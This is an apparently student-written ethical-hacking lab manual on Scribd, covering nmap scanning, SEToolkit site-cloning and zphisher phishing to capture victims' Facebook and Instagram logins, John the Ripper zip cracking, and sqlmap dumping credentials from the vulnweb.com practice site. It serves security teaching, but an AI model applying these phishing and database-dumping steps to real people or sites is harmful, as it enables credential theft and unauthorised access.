Scribd
Upload
48 views

Ethical - Hacking - Lab - Practicals

Uploaded by

parveen saini
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
48 views

Ethical - Hacking - Lab - Practicals

Uploaded by

parveen saini
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 30

Experiment - 1

Passive Reconnaissance using whois, which is an online tool.


Steps-:
1. Open a browser and search “whois”

2. Now open the first link that is appear as “whois.com”

3. Now type any domain name like www.flipkart.com & search.


4. Information like contact details, administrative details and technical
details & raw whois data regarding that site will be appear
Experiment - 2
Full scan, half open scan & stealth scan using “nmap”

1. Scanning single ip using nmap-:

Command: nmap IP-address-here


$ nmap 192.168.1.1

2. Scanning for single port -:


Command: sudo nmap -p <port no.> <ipaddress> or <weburl>

3. ICMP echo request ping -:


Command: nmap -sP -PE scanme.nmap.org
-: It will show this
Output -:
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.089s latency).
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
4. Scanning using TCP synscan
Command: sudo nmap -sS <target>

Output :- sudo nmap -sS scanme.nmap.org

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 09:43 EST


Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.18s latency).
Other addresses for scanme.nmap.org (not scanned):
2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
9929/tcp open nping-echo
31337/tcp open Elite

Nmap done: 1 IP address (1 host up) scanned in 14.76 seconds

5. Service Version detection


Command: - nmap -sV scanme.nmap.org

$ nmap -sV scanme.nmap.org


Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-11 03:37 UTC
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.074s latency).
Other addresses for scanme.nmap.org (not scanned):
2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu
Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
9929/tcp open nping-echo Nping echo
31337/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.82 seconds

6. Fin scan for nmap


command: - Sudo nmap -sf <ipaddress>

output :- krad# nmap -sF -T4 para

Starting Nmap ( https://nmap.org )


Nmap scan report for para (192.168.10.191)
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
53/tcp open|filtered domain
111/tcp open|filtered rpcbind
515/tcp open|filtered printer
6000/tcp open|filtered X11
MAC Address: 00:60:1D:38:32:90 (Lucent Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.64


seconds

krad# nmap -sX -T4 scanme.nmap.org

Starting Nmap ( https://nmap.org )


Nmap scan report for scanme.nmap.org (64.13.134.52)
Not shown: 999 open|filtered ports
PORT STATE SERVICE
113/tcp closed auth
Nmap done: 1 IP address (1 host up) scanned in 23.11
seconds
Experiment: - 3

Performing session, web jacking attack using SEtoolkit

Step -:
Step 1: check your IP address(Kali Linux)

Step 2: check all the machines inside the network


Command: Netdiscover –r 192.168.243.0/24
We got the N/w ip

Default gateway

Broadcast ip

Ping the IP (unknown )to check whether host is live or not:

Command: Ping 192.168.243.129


Now open social engineering framework in kali Linux

Command: Setoolkit

Click the first option :

1 social engineering attacks

Now since we have to perform the website cloning so we have to


chose the option

2) Website Attack Vectors

Then click on
5) Web Jacking Attack Method

Then on

2) Site Cloner

After this it will ask you for an ip address (put your kali linux
machine ip address)

After this it will ask you to enter the URL of the website you want to
clone.
In this let's clone the facebook website

Paste the url in the set tool kit terminal and it will start cloning it.
Now url has been cloned. you have to send the cloned website
to the victim so that he can click on the link and you will get his
credentials in your Kali Linux.
Once the victim will click on click on the link victim will be
redirected to the login page.

Here I am typing the details :

User name: [email protected]

Password:123456
Now go to you Kali Linux and go to the location :

root/.set//reports/2018–12–27 08:03:52.640607.html

Here in this file, you will get all the credentials in clear text.
This is how we can get the credentials of the victim.
Experiment – 4

Performing phishing attack using zphisher tool

Step 1: To install the tool first go to the desktop directory and then install the
tool using the following commands.
cd Desktop
git clone git://github.com/htr-tech/zphisher.git
cd zphisher

Step 2: Now you are in zphisher directory , use the following command to run
the tool.
bash zphisher.sh
Step 3: The tool has started running successfully. Now you have to choose the
options from the tool for which you have to make the phishing page.

Step 4: From these options, you can choose the number for which you have to
create a phishing page. Suppose you want to create a phishing page for
Instagram then choose option 2.
Step 5: Now you can see that to attract the victim , it’s giving 4 different web
templates. You can choose any option from here. Suppose you want to choose
the first option then type 1.

Example 1: Using Zphisher tool , create a phishing page of instagram and


get credentials(user id and password ) of victim.
After launching the tool you will see this interface.
You can send any of the links to the victim. Once he/she entered his/her id
password it will get reflected in the terminal.

You can see the link we have opened is ezlikers. This is the phishing page we
have opened. Now the user has to enter his/her id password.
EXPERIMENT 5
Active reconnaissance using “sam spade” tool.

Step 1:
open same space tool into this on the top left corner there's a
search bar enter domain name .
example -www.oracle.com and then select who is icon.
now all the details of the website will be displayed on the
screen.

Step 2:
now on the same page using the same domain name ( example
www.oracle.com )now click on ping icon .
ping send a series of packet to the indicated host to determine
if that system is reachable via the network and provides an
estimate of the round trip packet time.
Step 3:
on the same page using same domain name ( for example
www.oracle.com) and click on trace route icon.
Traceroute choose the route packets taken from the host to the
hosts you are looking at.
Step 4:

on the same page using same domain name ( www.oracle.com ) and click on web icon .

this will browse the web in a pro http format.

z
EXPERIMENT 6
Performing password cracking using john-the-ripper tool.

Step 1:

install join the report tools using the get up cloning technique

step 2:

create a text file using touch command .

step 3:

now create a zip of the creative text file and set password in it.

Step 4:

now find the hash value of the zip file created above and run zip2john command.c
step 5:

now copy the hash value of the zip file to a new text file .

step 6:

now Run [ john -- format = zip new.txt] command.

this command will break the password and will displayed that password.
EXPERIMENT 7
Performing sqlmap tool to access database and tables.

step 1:

open browser and search for a website ( example- vulnweb.com) and then copy the link of that
website .

In another web page type

site: URL_copied/artist.php?artist=1

now copied this link .

step 2:

now open terminal and type

sqlmap -u <copied link> -- dbs

this will fetch and then display all the database presented in that site.
Step 3:

now type

sqlmap -u <copied link> -D acuart --tables

this will display all table present in acuart database


Step 4:

now type

sqlmap -u <copied link> -D acuart –T users –columns

this will display all the columns present in users table of accuard database.
Step 5:

now type

sqlmap -u <copied link> -D acuart –T users –C pass –dump

this will show data of pass column of users table in acuart database.

In this way we got the password from the pass table.


Step 6:

now type

sqlmap -u <copied link> -D acuart –T users –C uname –dump

this will show data of uname column of users table in acuart database.

In this way we got the user name from the users table.
Step 7:

now open browser and type URL of website on which you performed sqlmap attack and then login
into that page using credentials you got by using SQL map attack.

You might also like